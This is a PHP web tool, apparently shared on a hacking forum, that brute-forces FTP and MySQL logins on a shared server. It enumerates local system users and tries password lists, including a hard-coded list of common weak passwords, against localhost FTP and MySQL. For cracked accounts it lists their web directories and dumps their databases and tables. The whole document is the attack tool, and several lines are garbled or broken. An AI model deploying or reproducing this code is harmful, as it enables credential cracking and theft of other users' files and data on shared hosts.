FTP & Mysql Brutaforce ( PHP )

cekidot
<?php

#By vc.emiter   

#PRIV8 nist

if($_GET[act] == "ftp")

{

   echo("<b>Online FTP BruteForce</b><br />");

   if($_GET[name] && $_GET[domain])

   {

      if($handle = @opendir("/home/{$_GET[name]}/domains/{$_GET[domain]}/public_html/"))

      {

         while(FALSE !== ($dir = @readdir($handle)))

         {

            if($dir != "." && $dir != "..")

               echo("{$dir}<br />\n");

         }

         closedir($handle);

      }

   }



   else

   {

      $_POST[usernames] = htmlspecialchars($_POST[usernames]);

      $_POST[passwords] = htmlspecialchars($_POST[passwords]);

      $chkdun = (isset($_POST[all_usernames])) ? " checked=\"checked\"" : "";

      $chkdpw = (isset($_POST[password_equal_username])) ? " checked=\"checked\"" : "";

echo <<<HTML

<form method="post" action="?act=ftp">



   <table>



      <tr>

     

         <input type="checkbox" id="all_usernames"  name="all_usernames"{$chkdun} /> All usernames in the server<br  />

         <input type="checkbox" id="password_equal_username"  name="password_equal_username"{$chkdpw} /> The username is the  password.<br />

         <strong>OR</strong><br />



      </tr>

     

      <tr>



         <td valign="top">

           

            <u>Usernames:</u><br />

            Specific usernames:<br />

            <textarea rows="5" cols="50" id="usernames"  name="usernames" />{$_POST[usernames]}</textarea><br />

       

         </td>

       

         <td valign="top">

       

            <u>Passwords:</u><br />

            Specific passwords:<br />

            <textarea rows="5" cols="50" id="passwords"  name="passwords" />{$_POST[passwords]}</textarea><br  /><br />

           

         </td>

       

      </tr>

     

      <tr>

     

         <td>

       

            <input type="submit" id="submit" name="submit" value="Start" />

           

         </td>

       

      </tr>

     

   </table>



</form>

HTML;

      if(isset($_POST[submit]))

      {

         echo("<br /><br /><u>Results:</u><br />");

         $usernames = explode("\r\n", $_POST[usernames]);

         $passwords = explode("\r\n", $_POST[passwords]);

         if(isset($_POST[all_usernames]))

         {

            if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid"))

            {

               $usernames = array();

               $number = ($_POST[end] > 0) ? $_POST[end] : "5000";

               for($x=0; $x<$number; $x++)

               {

                  $user = posix_getpwuid($x);

                  if(strlen($user[name]) > 0)

                     $usernames[] = $user[name];

               }

            }

            else

               echo("Unable to get usernames list.<br />");

         }

         foreach($usernames as $user)

         {

            if(isset($_POST[password_equal_username]))

            $passwords[user] = $user;

            foreach($passwords as $pass)

            {

               $sock = @fsockopen("127.0.0.1", "21", $errno, $errstr, 3);

               $get = @fgets($sock, 150);

               @fputs($sock, "USER {$user}\n");

               $get = @fgets($sock, 150);

               @fputs($sock, "PASS {$pass}\n");

               $get = @fgets($sock, 150);

               if(strstr($get, "logged"))

               {

                  $file = "/etc/virtual/domainowners";

                  $open = @fopen($file, "r");

                  $data = @fread($open, filesize($file));

                  if(preg_match_all("/(.*): {$user}/", $data, $matches))

                  {

                     foreach($matches[1] as $domain)

                        echo("



    * <a href=\"?act=ftp&name={$user}&domain={$domain}\">{$user}:{$pass}</a><br />\n");



                  }

                  @fclose($open);

                  @fclose($sock);

               }

            }

         }

      }

   }

}



elseif($_GET[act] == "mysql")

{

   echo("<b>Online MySQL BruteForce</b><br />");

   if($_GET[Kata kotor] && $_GET[passwd])

   {

      @mysql_connect("localhost", $_GET[Kata kotor], $_GET[passwd]);

      if($_GET[db])

      {

         @mysql_select_db($_GET[db]);

         if($_GET

)

         {

            $query = @mysql_query("SELECT * FROM {$_GET

} LIMIT 60");

               while($r = @mysql_fetch_assoc($query))

               {

                  if(!$columns)

                  {

                     echo("<table border=\"1\"><tr>");

                     foreach($r as $tmp => $value)

                        echo("<td><b>{$tmp}</b></td>");

                     echo("</tr></tables>");

                     $columns = 1;

                  }

                  echo("<tr>");

                  foreach($r as $tmp => $value)

                     echo("<td>{$value}</td>");

                  echo("</tr>\r\n");

               }

               echo("</tables>");

         }

         else

         {

            $query = @mysql_query("SHOW TABLES");

            while($r = @mysql_fetch_array($query))

               echo("<a href=\"?act=mysql&Kata kotor={$_GET[Kata  kotor]}&passwd={$_GET[passwd]}&db={$_GET[db]}&table={$r[0]}\">{$r[0]}</a><br  />\n");

         }

      }

      else

      {

         $query = @mysql_query("SHOW DATABASES");

         while($r = @mysql_fetch_array($query))

            echo("<a href=\"?act=mysql&Kata kotor={$_GET[Kata  kotor]}&passwd={$_GET[passwd]}&db={$r[0]}\">{$r[0]}</a><br  />\n");

      }

   }

   else

   {

      if($handle = @opendir("/var/lib/mysql/"))

      {

         while(FALSE !== ($name = @readdir($handle)))

         {

            if($name != "." && $name != "..")

            {

               $passwords = array(

               "123456", "123123", "12345", "qazwsx", "123321",

               "qwerty", "1q2w3e", "12qwer", "qweqwe", "111222",

               "111111", "112233", "121212", "q1w2e3", "micro",

               "test", "asdfgh", "zxcvbn", "");

               $usernames_count = count($name);

               $passwords_count = count($passwords);

               $results = 0;

               if($_GET[passwd])

               {

                  if(@mysql_connect("localhost", $f, $_GET[passwd]))

                     echo("



    * <a href=\"?act=mysql&Kata kotor={$f}&passwd={$GET[passwd]}\">{$f}</a><br />\n");



               }

               else

               {

                  foreach($passwords as $pass)

                  {

                     if(@mysql_connect("localhost", $name, $pass))

                     {

                        $results++;

                        echo("



    * <a href=\"?act=mysql&Kata kotor={$name}&passwd={$pass}\">{$name} => [{$pass}]</a><br />\n");



                     }

                  }

               }

            }

         }

         closedir($handle);

      }

      else

         echo("Unable to get usernames list.<br />");

   }

}



else

   echo("<a href=\"?act=ftp\">FTP Brute</a>&nbsp;|&nbsp;<a href=\"?act=mysql\">MySQL</a>");

//vc.emit3r

?>